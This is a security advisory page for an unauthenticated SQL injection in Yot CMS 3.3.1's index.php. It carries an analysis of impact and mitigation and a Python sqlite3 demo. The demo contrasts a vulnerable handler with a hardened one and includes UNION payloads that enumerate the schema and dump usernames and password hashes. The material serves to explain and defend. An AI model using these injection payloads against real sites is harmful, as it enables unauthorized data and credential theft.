CVE-2018-25425 in Yot
Summary
by MITRE • 05/30/2026
Yot CMS 3.3.1 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the aid and cid parameters. Attackers can send GET requests to index.php with crafted SQL payloads in the aid or cid parameters to extract database information including table and column names.
Analysis
by VulDB Data Team • 05/31/2026
Yot CMS version 3.3.1 suffers from a critical SQL injection vulnerability that is reachable by unauthenticated attackers. The flaw lies in the index.php endpoint, where the aid and cid query parameters are placed into a database query without validation or parameter binding, so request data becomes part of the SQL statement itself rather than a value the statement operates on. Because index.php is served without any session or credential check, the attacker does not have to defeat authentication at all; the injected statement simply runs with whatever privileges the application's own database account holds.
Exploitation follows the standard SQL injection pattern: the attacker sends a GET request to index.php with a crafted payload in aid or cid, the application concatenates that payload into its query, and the database executes the attacker's SQL alongside the application's. The reported impact is not limited to reading the rows the page was meant to show. Table and column names are typically recovered by pointing an injected SELECT (UNION-based where the output is reflected, blind or error-based otherwise) at the database's catalog tables, and once the schema is known the same technique reads the data in any table the database account can see. The weakness is classified as CWE-89 (Improper Neutralization of Special Elements used in an SQL Command).
The operational impact is significant: no credentials are required, and the injected queries run with the privileges of the application's database account, which in a typical CMS deployment can read every application table. Unauthenticated attackers can therefore extract user credentials or their hashes, personal data, application configuration and any other information held in the database. Because index.php is the public entry point of the site rather than an administrative page, exposure is not confined to users who know internal details of the application; any internet-facing installation is reachable. VulDB maps the weakness to ATT&CK technique T1213.002, a sub-technique of T1213 (Data from Information Repositories), reflecting that the attacker's objective is collection of stored data through the injection.
Mitigation should start with prepared statements and bound parameters for every query that incorporates request data; binding separates the structure of the SQL command from the values it operates on and removes the injection entirely, whereas escaping or "sanitizing" strings is brittle and easy to get wrong. For aid and cid, which are numeric identifiers, the application should additionally validate that each value is an unsigned integer before it reaches the data layer and reject anything else with an error. The application's database account should hold the least privilege it needs (access to its own tables only, no administrative rights), so that a residual injection elsewhere cannot read or alter everything. Regular code review and injection testing of every request parameter that reaches a query, and keeping the CMS current with vendor security patches, address the class of bug rather than this single instance.
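The following is an added illustration of both the exploitation pattern described in the analysis and the mitigation above; it is not Yot CMS code (the CMS is written in PHP and its source is not reproduced on this page). It is a Python model using sqlite3 with a constructed schema, constructed rows and constructed payloads: the vulnerable handler splices aid and cid into the query the way the advisory describes, the GET query string is parsed the way index.php would read it, and three UNION payloads enumerate table names, column names and finally credentials. The hardened handler validates the identifiers as integers and binds them, and the same payloads are rejected.

```python
"""
Added illustration of the aid/cid injection pattern described for index.php.
NOT the CMS's own code: a Python/sqlite3 model with a constructed schema,
constructed rows and constructed payloads. Catalog table names (sqlite_master,
pragma_table_info) are SQLite's; a MySQL target would use information_schema.
"""
import re
import sqlite3
from urllib.parse import parse_qs, urlencode


def build_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (aid INTEGER PRIMARY KEY, cid INTEGER, "
                 "title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT, "
                 "password_hash TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?, ?)",
                     [(1, 10, "Welcome", "Hello"), (2, 10, "News", "Update"),
                      (3, 20, "About", "Us")])
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 (1, "admin", "$2y$10$constructed-hash-value"))
    conn.commit()
    return conn


def show_article_vulnerable(conn, aid: str, cid: str):
    """Vulnerable handler (CWE-89): both parameters are spliced into the SQL
    text, so whatever follows 'cid=' in the GET request becomes SQL."""
    sql = f"SELECT title, body FROM articles WHERE aid = {aid} AND cid = {cid}"
    return conn.execute(sql).fetchall()


def show_article_safe(conn, aid: str, cid: str):
    """Hardened handler: reject anything that is not a plain unsigned integer,
    then bind the values so they can never alter the statement's structure."""
    for name, value in (("aid", aid), ("cid", cid)):
        if not re.fullmatch(r"[0-9]+", value):
            raise ValueError(f"{name} must be an unsigned integer")
    sql = "SELECT title, body FROM articles WHERE aid = ? AND cid = ?"
    return conn.execute(sql, (int(aid), int(cid))).fetchall()


def handle_get(conn, query_string: str, handler):
    """Models index.php reading aid and cid from the query string of a GET."""
    params = parse_qs(query_string)
    aid = params.get("aid", [""])[0]
    cid = params.get("cid", [""])[0]
    return handler(conn, aid, cid)


# Constructed UNION payloads. cid=0 matches no article, so the only rows that
# come back are the injected SELECT's. Each SELECT list has two columns to
# match the original query's (title, body).
PAYLOADS = {
    # step 1: table names from the database catalog
    "tables": "0 UNION SELECT name, sql FROM sqlite_master WHERE type='table'",
    # step 2: column names of a table found in step 1
    "columns": "0 UNION SELECT name, type FROM pragma_table_info('users')",
    # step 3: the data itself
    "creds": "0 UNION SELECT username, password_hash FROM users",
}


def run_demo():
    """Replays each payload against both handlers and returns what each saw."""
    conn = build_db()
    out = {}
    for step, payload in PAYLOADS.items():
        qs = urlencode({"aid": "1", "cid": payload})   # index.php?aid=1&cid=...
        out[step] = handle_get(conn, qs, show_article_vulnerable)
        try:
            handle_get(conn, qs, show_article_safe)
            out[step + "_safe"] = "accepted"
        except ValueError as exc:
            out[step + "_safe"] = f"rejected: {exc}"
    out["legit"] = handle_get(conn, "aid=1&cid=10", show_article_safe)
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Binding alone would already neutralize these payloads (the whole string is compared as a value against an integer column and matches nothing); the integer check in front of it turns a silent empty result into an explicit rejection, which is both easier to log and a clearer contract for a numeric identifier. The aid parameter is spliced the same way in the vulnerable handler, so the same payloads work there with the roles reversed.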